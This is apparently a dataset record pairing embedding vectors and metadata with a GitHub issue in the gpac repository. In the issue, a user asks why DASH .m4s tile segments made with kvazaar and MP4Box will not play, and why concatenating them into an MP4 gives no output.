0.00213510706089437, -0.00735542643815279, 0.011597593314945698, -0.00870871264487505, -0.004364874213933945, 0.012649370357394218, -0.016127245500683784, 0.007004834245890379, -0.015089492313563824, 0.0012358378153294325, -0.0013383860932663083, -0.0032657673582434654, 0.010363508015871048, -0.01727718859910965, 0.0017441966338083148, 0.0006275601917877793, 0.0063702622428536415, 0.021498320624232292, -0.026448683813214302, 0.02420489303767681, 0.028776615858078003, 0.00120253162458539, 0.014654758386313915, 0.00006957066216273233, -0.021175775676965714, -0.020965419709682465, -0.014374284073710442, 0.01724914088845253, 0.012081410735845566, 0.006941727362573147, 0.003455087076872587, 0.007439568638801575, -0.008070634678006172, 0.011204930022358894, 0.01108572818338871, 0.016309553757309914, 0.0034813815727829933, -0.007867291569709778, 0.002208731370046735, -0.00884193740785122, 0.0015908125787973404, 0.03152525797486305, 0.0037408198695629835, 0.015552273951470852, -0.011541498824954033, -0.009823596104979515, 0.00020717813458759338, 0.015608369372785091, 0.008280989713966846, 0.005262390244752169, -0.0012735265772789717, -0.012067386880517006, 0.009543122723698616, 0.022816546261310577, 0.0014733641874045134, -0.008919067680835724, 0.0035146877635270357, 0.013722182251513004, -0.010230283252894878, 0.00840019155293703, 0.005139682907611132, -0.00972543004900217, 0.013722182251513004, -0.01689854823052883, 0.0006201101350598037, -0.0073904856108129025, -0.009430932812392712, 0.014963279478251934, -0.028005313128232956, -0.009311731904745102, 0.015159610658884048, -0.013904490508139133, -0.012621322646737099, 0.0005478004459291697, -0.018006419762969017, -0.0026732662227004766, -0.02486400492489338, -0.010714100673794746, -0.01245303824543953, 0.007320367265492678, -0.008309037424623966, 0.012389931827783585, 0.019058197736740112, 0.00991475023329258, -0.023251282051205635, 0.018960030749440193, -0.00005299969416228123, -0.015229729004204273, -0.004848691634833813, 0.006359744351357222, 0.004848691634833813, 0.0024296045303344727, -0.016099197790026665, 0.05236446484923363, 0.004098423756659031, 0.0015776653308421373, 0.02472376823425293, -0.00493984529748559, -0.015089492313563824, 0.003667195327579975, 0.00989371445029974, 0.0028240210376679897, 0.004136988893151283, -0.006454404443502426, 0.00038784273783676326, 0.018427131697535515, -0.004683913197368383, 0.009276672266423702, -0.006759419571608305, -0.021442225202918053, 0.013084104284644127, -0.010517768561840057, -0.0001424281217623502, -0.02469572238624096, -0.00960622914135456, 0.028832711279392242, -0.012382919900119305, 0.004659371450543404, 0.009648299776017666, 0.0029397164471447468, 0.025859687477350235, 0.011709783226251602, -0.013778277672827244, 0.030094843357801437, -0.011765877716243267, -0.008947115391492844, -0.013778277672827244, 0.02465365082025528, 0.008365131914615631, -0.0037653613835573196, 0.020586779341101646, -0.028566259890794754, -0.016379673033952713, 0.01963316835463047, -0.005083588417619467, 0.00010550636943662539, -0.022774476557970047, -0.00019337356206960976, -0.018805770203471184, -0.00044569047167897224, 0.0098726786673069, 0.00428774394094944, -0.015187658369541168, -0.005651548039168119, 0.01995571330189705, -0.0015583827625960112, 0.006861091125756502, 0.003299073548987508, -0.008610546588897705, -0.0058829388581216335, -0.0028853747062385082, -0.014612686820328236, -0.00213160109706223, -0.004101929720491171, -0.010489721782505512, -0.0038810567930340767, 0.010026940144598484, -0.018160680308938026, 0.01719304546713829, 0.007057422772049904, 0.004855703562498093, -0.013462744653224945, 0.000827397801913321, -0.0006126600201241672, 0.0077551016584038734, -0.0167863592505455, 0.008764807134866714, -0.002366498112678528, -0.020516661927103996, -0.0034252868499606848, 0.0015171881532296538, 0.0069031622260808945, 0.004862715024501085, -0.01952097937464714, -0.007874302566051483, -0.006994316354393959, 0.000003036868747585686, 0.008603534661233425, -0.016730263829231262, -0.006258072331547737, -0.001894951332360506, -0.020123997703194618, 0.024078678339719772, 0.027584601193666458, 0.025130456313490868, -0.020797135308384895, -0.007243236992508173, -0.002473428612574935, -0.0049117980524897575, -0.017725946381688118, 0.00869468878954649, -0.01110676396638155, 0.005244860891252756, -0.007909362204372883, -0.014472450129687786, -0.009704395197331905, 0.002364745130762458, -0.0023472155444324017, -0.0018125622300431132, 0.0035672765225172043, -0.004981916397809982, -0.023405542597174644, 0.028692474588751793, -0.01705280877649784, 0.010454662144184113, -0.0033534152898937464, 0.003649665741249919, -0.00015272677410393953, 0.021512342616915703, 0.0008861220558173954, 0.023966489359736443, 0.0009658818016760051, -0.016758311539888382, -0.018875889480113983, -0.015131563879549503, 0.021372105926275253, 0.011779901571571827, 0.015720559284090996, 0.0007542116800323129, 0.011450344696640968, 0.007411521393805742, -0.010693064890801907, -0.025256669148802757, 0.01469682902097702, -0.025635309517383575, -0.0007572793401777744, 0.023770157247781754, 0.006230025086551905, 0.005311473272740841, -0.0054026274010539055, 0.021540390327572823, 0.012368896044790745, -0.016183340921998024, -0.025971878319978714, 0.038228582590818405, -0.0004868850519414991, -0.0010386296780779958, -0.006240542978048325, -0.010146141052246094, -0.007825220003724098, -0.008379155769944191, -0.0009895467665046453, -0.03172159194946289, 0.015173634514212608, 0.007046905346214771, 0.017950326204299927, -0.008238919079303741, -0.002606653841212392, 0.020474590361118317, 0.00840019155293703, 0.01695464365184307, -0.022704357281327248, 0.009052293375134468, 0.010840313509106636, 0.008203859440982342, -0.005914492066949606, 0.006794478744268417, 0.0027503964956849813, 0.011821972206234932, 0.003656677668914199, -0.01347676757723093, 0.01351883914321661, 0.009437944740056992, -0.0024138279259204865, 0.004147506784647703, -0.00011580502177821472, -0.02222755178809166, 0.00735542643815279, -0.0037127723917365074, 0.01097353920340538, -0.0046733953058719635, 0.01973133534193039, -0.004052847158163786, 0.010314425453543663, 0.002645218977704644, -0.027963241562247276, 0.008379155769944191, -0.003961693029850721, -0.0016416484722867608, -0.007783148903399706, -0.011499427258968353, 0.022578144446015358, 0.004249178804457188, -0.015117540024220943, -0.0063667562790215015, 0.00736243836581707, -0.013063069432973862, -0.012011292390525341, 0.019086245447397232, -0.0018476214027032256, 0.005812820512801409, 0.01350481528788805, -0.009185518138110638, 0.01457061618566513, -0.010286377742886543, 0.001416392857208848, 0.00613887095823884 ]
1,701
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I run the following commands: ``` kvazaar -i output_1280x720p.yuv --input-res 1280x720 -o output.hvc --tiles 2x2 --slices tiles --mv-constraint frametilemargin --bitrate 128000 --period 30 --input-fps 30 MP4Box -add output.hvc:split_tiles -fps 30 -new video_tiled.mp4 MP4Box -dash 1000 -rap -frag-rap -profile live -out dash_tiled.mpd video_tiled.mp4 ``` After running I got the last command , I got .m4s file track ID wise as expected but I am not able to play them on gpac (it says Filter not found for desired type). Also I want to combine to combine .m4s trackid wise to a tile_x.mp4 file for object detection , so I run the following command ``` cat video_tiled_dash_track2_init.mp4 $(ls -vx video_tiled_dash_track2_*.m4s) > source_2.mp4 ``` So, I got source_2.mp4 which was suppose to contain to track ID 2 but the there is no output of source_2.pm4 with gpac Can anybody explain why this is happening and help me resolve this? Thanks in advance! Please let me know if more details are required
.m4s not playing correctly
https://api.github.com/repos/gpac/gpac/issues/1816/comments
4
2021-05-27T19:54:41
2021-05-28T18:07:18Z
https://github.com/gpac/gpac/issues/1816
904,132,748
1,816
false
This is a GitHub Issue repo:gpac owner:gpac Title : .m4s not playing correctly Issue date: --- start body --- I run the following commands: ``` kvazaar -i output_1280x720p.yuv --input-res 1280x720 -o output.hvc --tiles 2x2 --slices tiles --mv-constraint frametilemargin --bitrate 128000 --period 30 --input-fps 30 MP4Box -add output.hvc:split_tiles -fps 30 -new video_tiled.mp4 MP4Box -dash 1000 -rap -frag-rap -profile live -out dash_tiled.mpd video_tiled.mp4 ``` After running I got the last command , I got .m4s file track ID wise as expected but I am not able to play them on gpac (it says Filter not found for desired type). Also I want to combine to combine .m4s trackid wise to a tile_x.mp4 file for object detection , so I run the following command ``` cat video_tiled_dash_track2_init.mp4 $(ls -vx video_tiled_dash_track2_*.m4s) > source_2.mp4 ``` So, I got source_2.mp4 which was suppose to contain to track ID 2 but the there is no output of source_2.pm4 with gpac Can anybody explain why this is happening and help me resolve this? Thanks in advance! Please let me know if more details are required --- end body ---
1,170
[ -0.010302399285137653, 0.044885847717523575, -0.015505481511354446, 0.013926767744123936, 0.004350725561380386, 0.028179654851555824, -0.03572486713528633, 0.04040912166237831, -0.011599463410675526, 0.021257035434246063, 0.005584789905697107, -0.010028162971138954, 0.017299136146903038, 0.010183810256421566, -0.013356059789657593, 0.005910908803343773, -0.024755405262112617, 0.016409721225500107, -0.005269788205623627, 0.004087606444954872, 0.020219383761286736, -0.005959085654467344, -0.007597093004733324, 0.018499847501516342, -0.004743550438433886, 0.02644529566168785, -0.023006221279501915, 0.019374439492821693, -0.018900085240602493, 0.011251108720898628, -0.006403793580830097, 0.016128072515130043, -0.01635042577981949, 0.026356352493166924, 0.04524161294102669, 0.020664092153310776, 0.04453008249402046, 0.0547880083322525, -0.011569816619157791, -0.00009038919233717024, -0.026623178273439407, -0.029143190011382103, -0.02877259999513626, 0.009472277946770191, -0.01808478683233261, 0.026178469881415367, -0.006570558995008469, 0.023021044209599495, -0.009931809268891811, -0.0427512489259243, 0.005058552138507366, -0.016572780907154083, -0.036910753697156906, -0.02561517432332039, 0.016068777069449425, -0.028668833896517754, 0.0372072234749794, 0.006978207733482122, -0.004788021557033062, 0.022961750626564026, 0.0008014006307348609, -0.007434033323079348, 0.016172543168067932, 0.04945151507854462, -0.010191221721470356, -0.022561512887477875, -0.012859469279646873, 0.04604208841919899, -0.01809960976243019, 0.02416246198117733, 0.0181292574852705, -0.015386892482638359, 0.004087606444954872, 0.00011395639012334868, 0.012659350410103798, -0.06836642324924469, 0.029632367193698883, 0.047672685235738754, 0.007686034310609102, 0.039727237075567245, -0.055114127695560455, -0.0061592040583491325, -0.0652238205075264, 0.03501333296298981, 0.023436104878783226, 0.017432548105716705, -0.035487689077854156, -0.06480876356363297, -0.029899192973971367, -0.010154163464903831, -0.003457603743299842, 0.0217758622020483, 0.030773784965276718, -0.013445001095533371, 0.01670619286596775, 0.020115619525313377, -0.006918913219124079, 0.011065814644098282, -0.04224724695086479, -0.043996430933475494, -0.014060180634260178, -0.00014626719348598272, 0.005888673476874828, -0.00905721727758646, 0.037385109812021255, -0.02512599527835846, 0.02457752265036106, -0.026830708608031273, 0.0061554983258247375, 0.10589976608753204, 0.013163353316485882, 0.023599164560437202, 0.016987841576337814, -0.028461303561925888, -0.01280017476528883, 0.013600649312138557, -0.031040608882904053, -0.044856201857328415, -0.0020512151531875134, 0.006615029647946358, 0.002759041730314493, -0.004750962369143963, -0.030833078548312187, 0.030017782002687454, -0.03201896697282791, 0.05544024705886841, -0.02007114887237549, 0.0029498955700546503, -0.003648457583039999, 0.003483545035123825, -0.03115919791162014, -0.020767858251929283, -0.007482210174202919, -0.024873994290828705, 0.023139633238315582, 0.004947375040501356, -0.05013339966535568, -0.0004775977286044508, 0.013415354304015636, 0.007048619911074638, -0.0324636735022068, -0.0260450579226017, 0.05120069906115532, -0.00910168793052435, -0.0014388152630999684, -0.02364363521337509, 0.02554105594754219, 0.025674467906355858, -0.00382819352671504, 0.027601534500718117, -0.033264148980379105, -0.016380073502659798, -0.003987547475844622, -0.02416246198117733, 0.025718938559293747, 0.05380965396761894, -0.0002853542100638151, -0.007230208721011877, -0.02702341414988041, -0.02509634755551815, 0.019759852439165115, -0.03827452287077904, 0.010502517223358154, 0.014771712943911552, 0.004006076604127884, -0.02235398255288601, -0.017580784857273102, 0.036881107836961746, -0.02276904322206974, 0.0099762799218297, -0.016454191878437996, 0.031337082386016846, 0.033145561814308167, 0.017892079427838326, -0.04218795523047447, -0.040675945580005646, 0.010947225615382195, 0.026371177285909653, -0.05638895928859711, 0.03498368710279465, -0.05167505517601967, -0.017906904220581055, 0.0044433725997805595, 0.006570558995008469, 0.0019715381786227226, -0.04138747975230217, 0.03907499834895134, -0.045775264501571655, 0.021153271198272705, -0.013548766262829304, 0.008464273065328598, 0.037829816341400146, 0.014690183103084564, -0.010168986395001411, 0.01679513417184353, -0.017565960064530373, -0.030536606907844543, -0.051378581672906876, 0.01718054711818695, -0.011992288753390312, 0.006566852796822786, -0.017758667469024658, 0.030062252655625343, 0.009368512779474258, -0.025422466918826103, 0.037859462201595306, -0.018277494236826897, 0.02328786812722683, -0.01065075397491455, -0.04138747975230217, -0.04927363246679306, -0.04082418233156204, 0.044411491602659225, -0.004302548710256815, 0.0030462490394711494, 0.007141267415136099, -0.024903640151023865, 0.007619328331202269, -0.0015212715370580554, -0.004791727289557457, 0.043966785073280334, -0.0040764887817204, 0.017580784857273102, 0.006459381897002459, -0.0186777301132679, -0.0039467825554311275, 0.007248738314956427, 0.005080787464976311, -0.023436104878783226, 0.00765638705343008, 0.031040608882904053, 0.03157426044344902, -0.002644158899784088, -0.004339607432484627, -0.005514377728104591, -0.005540318787097931, -0.008479096926748753, -0.00486955139786005, 0.007730504963546991, -0.012007112614810467, -0.022116804495453835, 0.02466646395623684, 0.0070893848314881325, 0.022087156772613525, -0.011280756443738937, 0.03809664025902748, 0.009664984419941902, 0.013393118977546692, -0.04740585759282112, -0.02607470564544201, 0.012696409597992897, -0.018425729125738144, -0.0004345166380517185, 0.014705006964504719, -0.013422765769064426, 0.03539874777197838, 0.023895636200904846, -0.02045656181871891, 0.01165134645998478, -0.04782091826200485, 0.003018454648554325, -0.007148678880184889, -0.022546689957380295, -0.03400532901287079, 0.01584642380475998, -0.034657567739486694, -0.02099021151661873, -0.014467829838395119, -0.006700265221297741, -0.006255557294934988, -0.007237620651721954, -0.03293802961707115, -0.021286683157086372, 0.004891786724328995, -0.007270973641425371, -0.021924098953604698, -0.005273494403809309, -0.006796618457883596, 0.022013040259480476, 0.022991396486759186, -0.007545210421085358, 0.0070967962965369225, -0.0020567739848047495, 0.024547874927520752, -0.021197741851210594, -0.00557737797498703, 0.045834556221961975, 0.0066446769051253796, -0.05772308260202408, 0.016113247722387314, 0.029469307512044907, 0.025718938559293747, -0.043937139213085175, 0.010050398297607899, -0.008464273065328598, 0.0018483171006664634, 0.01768454909324646, 0.010717459954321384, 0.04372960701584816, 0.015031126327812672, -0.017328783869743347, 0.0474947988986969, 0.023109985515475273, -0.009716867469251156, -0.04592350125312805, -0.0010265340097248554, -0.020767858251929283, 0.019656088203191757, -0.02703823894262314, -0.04132818430662155, 0.028179654851555824, -0.01635042577981949, -0.0334123857319355, 0.030922019854187965, 0.0019400380551815033, -0.0034501918125897646, 0.0139341801404953, -0.02789800800383091, -0.0528905913233757, 0.007144973147660494, -0.0008134448435157537, -0.011947818100452423, -0.018499847501516342, 0.00884227454662323, 0.00906462874263525, -0.000264276925008744, -0.028105538338422775, -0.02690482698380947, -0.05123034864664078, 0.02607470564544201, 0.020323149859905243, 0.006085086148232222, 0.026890002191066742, -0.011592051945626736, 0.0162318367511034, -0.04927363246679306, -0.018900085240602493, -0.020753033459186554, 0.01465312484651804, -0.014334416948258877, -0.036050986498594284, 0.00614808639511466, 0.02736435830593109, -0.010791577398777008, 0.003687369404360652, 0.005351318046450615, -0.0018334934720769525, 0.033768150955438614, 0.04888821765780449, -0.01165875792503357, 0.0009561219485476613, -0.00022617564536631107, 0.0058590262196958065, -0.012244289740920067, 0.005625554360449314, -0.013926767744123936, -0.006577970460057259, -0.013281941413879395, 0.023154456168413162, -0.00020000273070763797, 0.028594715520739555, -0.05333529785275459, 0.020382443442940712, 0.015223832800984383, 0.017299136146903038, 0.011073226109147072, -0.025333525612950325, -0.012785350903868675, -0.03109990432858467, -0.008968275040388107, -0.0009274011827073991, 0.0157574824988842, -0.041595008224248886, -0.0034668685402721167, -0.06219980865716934, -0.0048806690610945225, -0.004276607185602188, -0.02518528886139393, -0.024325519800186157, 0.007663798984140158, -0.04936257377266884, 0.030329076573252678, 0.021761039271950722, -0.019211379811167717, -0.008738509379327297, 0.04918469116091728, 0.0036299279890954494, -0.0034057211596518755, -0.02791283093392849, -0.023465752601623535, -0.013682179152965546, 0.01534242182970047, -0.033175207674503326, -0.014742066152393818, -0.018870437517762184, -0.006151792127639055, -0.04476726055145264, -0.03115919791162014, 0.008404978550970554, -0.031337082386016846, 0.021509038284420967, 0.0077675641514360905, 0.016824781894683838, 0.031040608882904053, -0.030566254630684853, 0.006007262039929628, 0.007545210421085358, -0.003177808364853263, 0.029988134279847145, -0.017358429729938507, 0.019685735926032066, -0.008471684530377388, -0.009924397803843021, -0.024518227204680443, 0.01440112292766571, 0.03195967152714729, 0.029513780027627945, -0.0011645787162706256, -0.03877852484583855, 0.0297657810151577, 0.009761338122189045, 0.011332638561725616, 0.015505481511354446, -0.003150014206767082, 0.013274529948830605, 0.017388077452778816, 0.0014054621569812298, -0.0012146084336563945, 0.025452114641666412, -0.010317222215235233, 0.029647191986441612, -0.03563592582941055, 0.012399937957525253, -0.01761043258011341, 0.006073968484997749, -0.0067892069928348064, -0.027082709595561028, -0.01713607646524906, -0.0005484730354510248, -0.009813220240175724, -0.016928546130657196, 0.0064630876295268536, 0.01119181513786316, 0.02136080153286457, 0.025333525612950325, -0.016024306416511536, -0.05686331167817116, -0.03616957366466522, -0.007378445006906986, -0.01635042577981949, 0.01864808425307274, 0.0614289790391922, 0.007044913712888956, -0.030017782002687454, -0.0045100790448486805, 0.00430625444278121, -0.007459974382072687, 0.005784908309578896, 0.022576335817575455, -0.025333525612950325, -0.022605983540415764, 0.018855614587664604, 0.008694038726389408, 0.0058553204871714115, 0.04657573625445366, -0.0038541348185390234, -0.026193292811512947, -0.010724871419370174, 0.003672545775771141, -0.011243697255849838, 0.032849088311195374, -0.018470199778676033, 0.023569516837596893, 0.025259407237172127, 0.001543506863527, 0.02935072034597397, -0.028120361268520355, -0.04968869313597679, 0.013237470760941505, -0.03851170092821121, 0.021924098953604698, -0.016469014808535576, 0.012770527973771095, 0.032315440475940704, -0.04310701787471771, -0.02607470564544201, 0.013296765275299549, -0.03637710213661194, -0.02099021151661873, 0.011636522598564625, 0.04328490048646927, 0.02736435830593109, 0.01635042577981949, -0.03195967152714729, 0.007104208227247, 0.018766671419143677, 0.011962641961872578, -0.01484583131968975, 0.007552621886134148, 0.0008120550774037838, -0.014697595499455929, -0.015253479592502117, 0.00405795918777585, -0.0005401347880251706, 0.0296916626393795, -0.00859768595546484, 0.002912836614996195, 0.014675360172986984, -0.039252880960702896, 0.00756373954936862, -0.005410612560808659, -0.03302697092294693, -0.00008477243682136759, -0.024310696870088577, -0.026815883815288544, -0.029172835871577263, 0.00007417588494718075, -0.006952266208827496, 0.023480575531721115, -0.02364363521337509, -0.020738210529088974, -0.0021698037162423134, -0.000873202458024025, 0.026712119579315186, -0.012355467304587364, 0.016617251560091972, 0.01713607646524906, -0.011043578386306763, -0.0048139626160264015, 0.000723113538697362, -0.031870730221271515, -0.005610730964690447, 0.030314253643155098, 0.0345093309879303, 0.009353688918054104, 0.0027757182251662016, -0.036466047167778015, 0.024043872952461243, 0.0052549648098647594, 0.0024755403865128756, -0.040616653859615326, 0.02094574086368084, -0.02282833680510521, 0.015209008939564228, -0.04325525090098381, 0.0018195963930338621, -0.01952267624437809, 0.009887338615953922, -0.015171950682997704, 0.008686627261340618, 0.014734653756022453, -0.00951674859970808, 0.004595314618200064, 0.01955232210457325, 0.0038393111899495125, 0.02518528886139393, 0.02325822226703167, 0.018944555893540382, 0.018959378823637962, 0.022205745801329613, -0.02133115381002426, 0.012229466810822487, 0.03806699439883232, 0.01855914108455181, -0.00859768595546484, 0.028090713545680046, 0.0028646597638726234, 0.008471684530377388, -0.03290838375687599, -0.010309810750186443, 0.003891193773597479, -0.020337972790002823, 0.013874885626137257, -0.007130149751901627, 0.010376516729593277, 0.02368810586631298, 0.01489030197262764, -0.007200561463832855, -0.011532757431268692, -0.018233023583889008, 0.049006808549165726, -0.0020678916480392218, 0.011732876300811768, -0.007167208474129438, -0.025941291823983192, -0.035072628408670425, 0.014875478111207485, 0.00837533175945282, -0.03664392977952957, 0.0009023863822221756, 0.011214050464332104, 0.02276904322206974, 0.005951673723757267, -0.014942184090614319, 0.01958196982741356, -0.021153271198272705, 0.002827600808814168, 0.004232136532664299, 0.04014229774475098, -0.001257226220332086, -0.022976573556661606, 0.04927363246679306, -0.030388372018933296, -0.015490657649934292, -0.013370883651077747, 0.0008472611662000418, 0.02045656181871891, -0.008012153208255768, -0.02877259999513626, 0.016839604824781418, 0.00014325615484267473, 0.00521790562197566, 0.06255557388067245, 0.0003654942847788334, 0.013267118483781815, 0.027171650901436806, 0.015268303453922272, 0.0019048320828005672, 0.013356059789657593, 0.010643341578543186, 0.010280163958668709, -0.01667654514312744, 0.05250517651438713, -0.028920834884047508, 0.03854135051369667, 0.04616067558526993, -0.0099762799218297, -0.00534761231392622, -0.012681585736572742, -0.024029048159718513, -0.023391634225845337, -0.016898898407816887, -0.009931809268891811, -0.03957900032401085, -0.011984877288341522, -0.011340050958096981, 0.02275422029197216, -0.025392819195985794, -0.020604798570275307, -0.010450635105371475, -0.0199525598436594, -0.0037040458992123604, -0.024458933621644974, 0.03210790827870369, -0.01256299763917923, 0.03388673812150955, -0.00180569919757545, -0.00910168793052435, -0.013600649312138557, 0.018470199778676033, -0.015268303453922272, -0.027660829946398735, 0.007219091057777405, 0.01953749917447567, 0.03806699439883232, -0.020160090178251266, -0.0025922763161361217, 0.029662014916539192, -0.005128964316099882, -0.023984577506780624, -0.01721019484102726, -0.01626148447394371, 0.010280163958668709, -0.024325519800186157, -0.005618142895400524, 0.020619621500372887, -0.02229468710720539, -0.00046532193664461374, -0.03868958353996277, 0.021672096103429794, 0.007378445006906986, -0.010257928632199764, 0.029602721333503723, 0.0033964563626796007, 0.011732876300811768, 0.002933219075202942, 0.0020827152766287327, 0.006014673970639706, 0.026371177285909653, -0.02745329961180687, -0.000002041139623543131, -0.015979835763573647, -0.003437221283093095, 0.042158305644989014, -0.020367620512843132, 0.004202489275485277, 0.011354873888194561, -0.0018483171006664634, -0.010220869444310665, -0.011065814644098282, 0.045330554246902466, 0.020664092153310776, 0.00837533175945282, 0.06664688885211945, -0.010354281403124332, -0.0012535203713923693, -0.0036243691574782133, 0.003742957953363657, 0.0000695435082889162, -0.017284313216805458, -0.017803138121962547, 0.011043578386306763, 0.0022605983540415764, -0.013608060777187347, 0.002179068513214588, 0.019656088203191757, 0.0008769083069637418, -0.017343606799840927, -0.011243697255849838, 0.021642450243234634, 0.023006221279501915, 0.006003556307405233, 0.01071004755795002, 0.01394159160554409, -0.012051583267748356, -0.0029702780302613974, 0.004632373806089163, -0.011176991276443005, -0.03732581436634064, 0.011221461929380894, 0.015638893470168114, -0.029884368181228638, -0.003817075863480568, -0.005458788946270943, -0.010991696268320084, 0.033768150955438614, 0.029647191986441612, 0.003687369404360652, -0.00043914903653785586, 0.007000443059951067, -0.002008597133681178, -0.024355167523026466, 0.02318410389125347, 0.023421281948685646, -0.035991691052913666, -0.0007939888746477664, 0.004921433981508017, -0.004610138479620218, 0.007760152220726013, 0.028238950297236443, 0.008056623861193657, -0.004102430306375027, -0.016824781894683838, 0.0034872510004788637, 0.0051845526322722435, -0.013615472242236137, 0.011792170815169811, 0.006852207239717245, -0.013763708993792534, 0.009776161052286625, 0.017966197803616524, 0.010443223640322685, 0.03590274974703789, -0.040171943604946136, -0.005266082473099232, 0.017521489411592484, 0.019641265273094177, -0.01672101579606533, -0.0014360358472913504, -0.04879927635192871, 0.017106428742408752, 0.009079452604055405, -0.018840789794921875, -0.005495848134160042, -0.009961456060409546, -0.03889711573719978, -0.008471684530377388, -0.01188111212104559, 0.01020604558289051, -0.027542240917682648, -0.0013804472982883453, 0.005351318046450615, 0.005733025725930929, -0.03477615490555763, 0.02041209116578102, -0.02650458924472332, -0.020560327917337418, 0.01766972616314888, -0.01071004755795002, -0.005966497119516134, -0.03148531913757324, -0.00816038902848959, -0.030951667577028275, 0.03347167745232582, 0.016973016783595085, -0.019700558856129646, 0.03447968512773514, 0.008278978057205677, 0.004284019116312265, -0.004958492703735828, 0.032345086336135864, -0.00788615271449089, 0.017506666481494904, -0.021168094128370285, 0.025466937571763992, 0.004276607185602188, 0.004317372106015682, 0.01507559698075056, -0.0014193592360243201, 0.00039259367622435093, 0.006340792868286371, -0.006374146323651075, -0.005966497119516134, -0.03361991420388222, -0.012436997145414352, -0.04601244255900383, -0.023821517825126648, 0.00834568403661251, -0.023865988478064537, 0.021716568619012833, -0.017373254522681236, -0.0027812770567834377, 0.015727834776043892, -0.019700558856129646, 0.020678916946053505, -0.0025366877671331167, 0.018055139109492302, -0.036466047167778015, -0.014037945307791233, 0.03865993767976761, -0.03130743280053139, 0.0242217555642128, -0.0021271859295666218, 0.0013480207417160273, -0.011977464891970158, -0.046219971030950546, 0.002358804689720273, 0.027734948322176933, 0.024340344592928886, 0.0035613689105957747, -0.00019467550737317652, -0.007485915906727314, -0.033264148980379105, 0.004269195720553398, -0.03946041315793991, 0.030803432688117027, 0.021761039271950722, 0.002368069486692548, -0.00580714363604784, 0.03157426044344902, -0.018055139109492302, -0.008782980032265186, -0.014423358254134655, -0.036940399557352066, -0.00017915705393534154, -0.003972723614424467, 0.003831899492070079, -0.01726948842406273, -0.007126443553715944, 0.023791871964931488, 0.0058553204871714115, 0.024355167523026466, 0.03264155611395836, 0.028061065822839737, -0.013771120458841324, 0.0077675641514360905, 0.003103690454736352, -0.004117253702133894, 0.031337082386016846, -0.03664392977952957, 0.021938921883702278, 0.001054328284226358, -0.02146456576883793, 0.0033019559923559427, 0.007619328331202269, -0.009538983926177025, -0.009375924244523048, -0.037414755672216415, -0.01903349719941616, 0.015461009927093983, -0.011480875313282013, -0.027749771252274513, -0.018055139109492302, 0.0046212561428546906, -0.043018076568841934, 0.008212272077798843, -0.04147642105817795, 0.002418098971247673, -0.02001185342669487, 0.0005887746810913086, 0.00095704838167876, 0.010458046570420265, -0.0004366012290120125, -0.00932404212653637, 0.030329076573252678, -0.0075822691433131695, 0.0017890227027237415, -0.008234507404267788, -0.005836790893226862, -0.01818855106830597, 0.0000857568156789057, -0.0007207973394542933, -0.02835753932595253, -0.027245769277215004, 0.013815591111779213, 0.02603023499250412, -0.013370883651077747, -0.02376222424209118, -0.013823002576828003, -0.020797504112124443, -0.0186777301132679, -0.004106136038899422, -0.013000293634831905, 0.006170321721583605, -0.0053698476403951645, -0.005892379209399223, 0.00816038902848959, 0.011895935982465744, 0.002612658776342869, 0.002558923326432705, 0.017358429729938507, -0.003931958694010973, -0.006548323202878237, 0.013052175752818584, -0.03065519593656063, -0.03332344442605972, -0.023065514862537384, -0.0009894750546664, 0.02751259319484234, 0.0463978536427021, -0.01210346631705761, 0.002679364988580346, 0.014934772625565529, 0.04725762456655502, -0.006111027207225561, 0.004332195967435837, -0.026815883815288544, 0.01578713022172451, 0.018247846513986588, -0.012207231484353542, 0.007415503729134798, -0.0014295504661276937, -0.014319593086838722, -0.00035761925391852856, 0.023406457155942917, -0.009034981951117516, -0.0006221277872100472, 0.00018761113460641354, -0.017892079427838326, -0.05813814327120781, 0.01818855106830597, 0.023940106853842735, -0.023791871964931488, -0.0022013040725141764, 0.01065816543996334, 0.02462199330329895, -0.023080337792634964, -0.015223832800984383, -0.055173423141241074, -0.023791871964931488, -0.01578713022172451, -0.015431363135576248, -0.03759263828396797, -0.01864808425307274, -0.027245769277215004, 0.009086864069104195, -0.027245769277215004, -0.018351610749959946, -0.0012581526534631848, 0.01679513417184353, 0.004402608145028353, 0.021998215466737747, 0.014238063246011734, -0.004217313136905432, -0.0012386967428028584, 0.00592573219910264, -0.01762525551021099, 0.014912537299096584, -0.007526680827140808, -0.03130743280053139, 0.0028850422240793705, -0.02650458924472332, 0.001908537931740284, 0.013178176246583462, -0.009494513273239136, 0.03332344442605972, 0.0037670463789254427, -0.01416394580155611, -0.012866880744695663, -0.01863325946033001, -0.02235398255288601, -0.03593239560723305, 0.05117105320096016, -0.016409721225500107, -0.013311589136719704, 0.01302252896130085, 0.010628517717123032, 0.011451227590441704, -0.00044331816025078297, 0.006007262039929628, 0.003127778647467494, 0.01678031124174595, 0.01621701382100582, -0.024043872952461243, 0.03270085155963898, 0.012770527973771095, 0.034153565764427185, -0.0035298687871545553, -0.0205010324716568, -0.021093977615237236, -0.03643639758229256, -0.014453005976974964, -0.008530979044735432, 0.0016481985803693533, 0.007589681074023247, -0.001731581287458539, 0.01370441447943449, 0.008167801424860954, -0.023851165547966957, -0.005132670048624277, -0.03572486713528633, -0.029024600982666016, -0.00487696286290884, -0.004154312890022993, -0.022932102903723717, 0.013949004001915455, -0.017536314204335213, 0.005551436450332403, -0.011984877288341522, 0.023554693907499313, -0.013126294128596783, 0.01046545896679163, 0.0050029633566737175, 0.008286390453577042, 0.012963234446942806, 0.012370290234684944, 0.0018835231894627213, 0.006848501041531563, 0.02880224585533142, 0.02322857454419136, 0.002573746722191572, 0.01229617279022932, -0.015505481511354446, 0.03628816083073616, 0.006685441825538874, -0.017358429729938507, 0.002968424931168556, -0.023880813270807266, -0.030862726271152496, 0.0009978133020922542, 0.01466794777661562, -0.0012803880963474512, -0.030922019854187965, -0.027571888640522957, -0.0006939295562915504, -0.01531277410686016, 0.013304176740348339, 0.03593239560723305, -0.008923804387450218, -0.03628816083073616, 0.012125701643526554, 0.004246960394084454, 0.057841669768095016, -0.01726948842406273, 0.0006193483714014292, -0.010732282884418964, -0.005707084201276302, 0.009153570048511028, 0.002008597133681178, 0.017402902245521545, -0.013778531923890114, -0.03996441513299942, 0.027334710583090782, -0.016943369060754776, -0.011443816125392914, -0.015638893470168114, -0.01716572418808937, 0.010509929619729519, -0.002868365729227662, -0.001484212465584278, 0.009991103783249855, 0.010265340097248554, 0.0007796284626238048, 0.0013498737243935466, 0.026712119579315186, -0.0006619662162847817, 0.013096646405756474, -0.019344791769981384, 0.012140524573624134, -0.010910166427493095, -0.02230951189994812, 